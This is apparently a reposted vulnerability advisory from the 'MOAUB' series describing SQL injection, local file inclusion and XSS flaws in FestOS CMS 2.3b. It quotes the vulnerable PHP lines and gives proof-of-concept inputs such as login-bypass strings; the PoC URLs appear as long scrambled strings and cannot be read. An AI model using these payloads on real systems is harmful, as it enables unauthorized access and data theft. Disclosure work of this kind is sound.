'''
  __  __  ____         _    _ ____  
|  \/  |/ __ \   /\  | |  | |  _ \
| \  / | |  | | /  \ | |  | | |_) |
| |\/| | |  | |/ /\ \| |  | |  _ <  Day 9 (0day)
| |  | | |__| / ____ \ |__| | |_) |
|_|  |_|\____/_/    \_\____/|____/

0feK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3g2^5M7r3I4G2K9i4c8Q4x3X3c8V1j5W2)9J5k6h3y4G2L8g2)9J5c8X3#2G2j5i4g2T1i4K6u0V1z5g2)9J5k6r3k6W2M7%4c8G2M7#2)9J5k6r3y4E0M7#2)9J5k6o6u0Q4x3X3b7K6j5W2)9J5k6r3#2#2L8s2c8A6M7r3I4W2i4K6u0V1M7X3g2E0L8%4c8W2i4K6u0V1N6Y4g2D9L8X3g2J5j5h3u0A6L8r3W2@1K9h3g2K6i4K6u0r3
'''

Title  : FestOS CMS 2.3b Multiple Remote Vulnerabilities
Affected Version : <=2.3b
Vendor  Site   : 09bK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3k6W2M7%4c8W2L8X3N6A6L8X3g2Q4x3X3g2G2M7X3N6Q4x3V1j5`.

Discovery : abysssec.com

Description :

This CMS have many critical vulnerability that we refere to some of those here:

Vulnerabilites :

1- SQL Injection

Vulnerability :

1.1- in admin/do_login.php line 17:

// Process the login
$query = "SELECT userid, roleID, username FROM ".$config['dbprefix']."users WHERE LCASE(username) = '".strtolower($_POST['username'])."' and password ='".md5($_POST['password'])."'";
$res = $festos->query($query);

poc: in admin.php page:
username: admin' or '1'='1        
password: admin' or '1'='1

1.2- in festos_z_dologin.php:
$query = "SELECT vendorID FROM ".$config['dbprefix']."vendors WHERE LCASE(email) = '".strtolower($_POST['email'])."' and password ='".$_POST['password']."'";

poc: in applications.php page:
email: anything
pass: a' or 1=1/*

2- Local File Inclusion (lfi):

Vulnerability in index.php:

line 41:

if(isset($_GET['theme']) && !empty($_GET['theme']) && file_exists($config['ABSOLUTE_FILE_PATH'].'themes/'.$_GET['theme'])) {
...
require_once($themepath.'/includes/header.php');

poc:
6a9K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3I4G2j5$3q4D9K9r3!0K6N6q4)9J5c8X3k6W2M7%4c8G2M7#2)9J5c8X3W2F1k6r3g2^5i4K6u0W2M7r3S2H3i4K6y4r3N6r3S2W2L8h3g2Q4x3@1c8Q4x3X3g2Q4x3X3g2Q4x3V1k6S2k6r3#2A6L8W2)9J5c8X3y4K6M7#2)9J5c8X3q4V1L8h3W2F1i4K6u0W2j5%4y4K6i4K6t1#2x3o6l9`.
3d1K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3I4G2j5$3q4D9K9r3!0K6N6q4)9J5c8X3k6W2M7%4c8G2M7#2)9J5c8X3q4J5N6r3W2K6N6s2y4Q4x3X3g2H3K9s2m8Q4x3@1k6@1K9r3g2E0k6g2)9K6c8q4)9J5k6g2)9J5k6g2)9J5c8X3q4V1L8h3W2F1i4K6u0r3j5%4y4K6i4K6u0r3j5h3c8E0K9h3&6Q4x3X3g2U0M7%4y4Q4x3U0f1H3x3l9`.`.
8f7K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3I4G2j5$3q4D9K9r3!0K6N6q4)9J5c8X3k6W2M7%4c8G2M7#2)9J5c8X3y4G2L8Y4c8S2j5%4c8K6i4K6u0W2M7r3S2H3i4K6y4r3N6r3S2W2L8h3g2Q4x3@1c8Q4x3X3g2Q4x3X3g2Q4x3V1k6S2k6r3#2A6L8W2)9J5c8X3y4K6M7#2)9J5c8X3q4V1L8h3W2F1i4K6u0W2j5%4y4K6i4K6t1#2x3o6l9`.
d46K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3I4G2j5$3q4D9K9r3!0K6N6q4)9J5c8X3k6W2M7%4c8G2M7#2)9J5c8X3q4H3M7r3I4A6j5$3q4@1K9h3!0F1M7#2)9J5k6i4m8Z5M7q4)9K6c8Y4c8Z5k6h3#2W2i4K6y4p5i4K6u0W2i4K6u0W2i4K6u0r3j5h3c8E0K9h3&6Q4x3V1k6U0M7%4y4Q4x3V1k6S2k6r3#2A6L8W2)9J5k6h3y4K6M7#2)9J5y4e0l9H3
08bK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3I4G2j5$3q4D9K9r3!0K6N6q4)9J5c8X3k6W2M7%4c8G2M7#2)9J5c8X3g2F1N6r3g2J5N6r3q4A6L8X3g2J5M7#2)9J5k6i4m8Z5M7q4)9K6c8Y4c8Z5k6h3#2W2i4K6y4p5i4K6u0W2i4K6u0W2i4K6u0r3j5h3c8E0K9h3&6Q4x3V1k6U0M7%4y4Q4x3V1k6S2k6r3#2A6L8W2)9J5k6h3y4K6M7#2)9J5y4e0l9H3
7abK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3I4G2j5$3q4D9K9r3!0K6N6q4)9J5c8X3k6W2M7%4c8G2M7#2)9J5c8X3g2^5K9r3W2T1K9i4c8G2M7Y4y4Q4x3X3g2H3K9s2m8Q4x3@1k6@1K9r3g2E0k6g2)9K6c8q4)9J5k6g2)9J5k6g2)9J5c8X3q4V1L8h3W2F1i4K6u0r3j5%4y4K6i4K6u0r3j5h3c8E0K9h3&6Q4x3X3g2U0M7%4y4Q4x3U0f1H3x3l9`.`.
880K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3I4G2j5$3q4D9K9r3!0K6N6q4)9J5c8X3k6W2M7%4c8G2M7#2)9J5c8X3k6G2L8$3c8$3k6h3&6V1L8%4u0K6i4K6u0W2M7r3S2H3i4K6y4r3N6r3S2W2L8h3g2Q4x3@1c8Q4x3X3g2Q4x3X3g2Q4x3V1k6S2k6r3#2A6L8W2)9J5c8X3y4K6M7#2)9J5c8X3q4V1L8h3W2F1i4K6u0W2j5%4y4K6i4K6t1#2x3o6l9`.
2bbK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3I4G2j5$3q4D9K9r3!0K6N6q4)9J5c8X3k6W2M7%4c8G2M7#2)9J5c8Y4m8W2M7X3k6G2M7X3#2S2L8X3y4W2M7$3y4Z5k6h3c8#2L8r3g2Q4x3X3g2H3K9s2m8Q4x3@1k6@1K9r3g2E0k6g2)9K6c8q4)9J5k6g2)9J5k6g2)9J5c8X3q4V1L8h3W2F1i4K6u0r3j5%4y4K6i4K6u0r3j5h3c8E0K9h3&6Q4x3X3g2U0M7%4y4Q4x3U0f1H3x3l9`.`.
21bK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3I4G2j5$3q4D9K9r3!0K6N6q4)9J5c8X3k6W2M7%4c8G2M7#2)9J5c8Y4y4H3L8$3&6K6L8%4u0K6i4K6u0W2M7r3S2H3i4K6y4r3N6r3S2W2L8h3g2Q4x3@1c8Q4x3X3g2Q4x3X3g2Q4x3V1k6S2k6r3#2A6L8W2)9J5c8X3y4K6M7#2)9J5c8X3q4V1L8h3W2F1i4K6u0W2j5%4y4K6i4K6t1#2x3o6l9`.
627K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3I4G2j5$3q4D9K9r3!0K6N6q4)9J5c8X3k6W2M7%4c8G2M7#2)9J5c8Y4N6A6L8X3&6W2M7Y4y4Q4x3X3g2H3K9s2m8Q4x3@1k6@1K9r3g2E0k6g2)9K6c8q4)9J5k6g2)9J5k6g2)9J5c8X3q4V1L8h3W2F1i4K6u0r3j5%4y4K6i4K6u0r3j5h3c8E0K9h3&6Q4x3X3g2U0M7%4y4Q4x3U0f1H3x3l9`.`.

3- Cross Site Scripting:

in foodvendors.php, festos_foodvendors.php page has been included.

lines 31-36.

switch($switcher) {
        case 'details':
                if(!isset($_GET['vendorID']) || ctype_digit($_GET['vendorID'])===FALSE || $_GET['vendorID'] == '') {
                        $template = 'foodvendors_nonespecified.tpl';
                        break;
                }
and in line 74:
$tpl->set('vType', $_GET['category']);

and foodvendors_nonespecified.tpl

line 123:

<p>Back to the list of <a href="<?php echo $_SERVER['PHP_SELF'];?>?view=list&vTypeID=<?php echo $vTypeID;?>" title="<?php echo $vType;?> Category">exhibitors in the <?php echo $vType;?> category</a>.</p>

the category parameter is vulnerable to xss:
poc:
574K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3I4G2j5$3q4D9K9r3!0K6N6q4)9J5c8X3k6W2M7%4c8G2M7#2)9J5c8X3k6G2L8$3c8$3k6h3&6V1L8%4u0K6i4K6u0W2M7r3S2H3i4K6y4r3N6X3W2W2N6#2)9K6c8r3c8W2N6r3q4A6L8s2y4Q4x3U0k6$3k6h3&6V1L8%4u0u0c8q4)9K6c8o6c8Q4x3U0k6U0j5i4c8W2k6$3!0J5P5g2)9K6c8q4)9J5y4e0y4o6K9h3k6J5j5h3#2W2i4K6t1#2x3U0m8K6M7X3y4Q4x3@1c8B7j5i4k6S2M7$3y4J5K9i4m8@1i4K6y4m8j5h3I4W2M7Y4c8Q4x3U0f1J5z5q4)9J5y4e0t1J5h3q4y4e0i4K6t1#2x3U0u0Q4x3U0f1J5z5g2)9K6b7W2)9J5y4Y4k6f1P5i4m8W2d9f1c8Q4x3@1b7J5z5l9`.`.

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课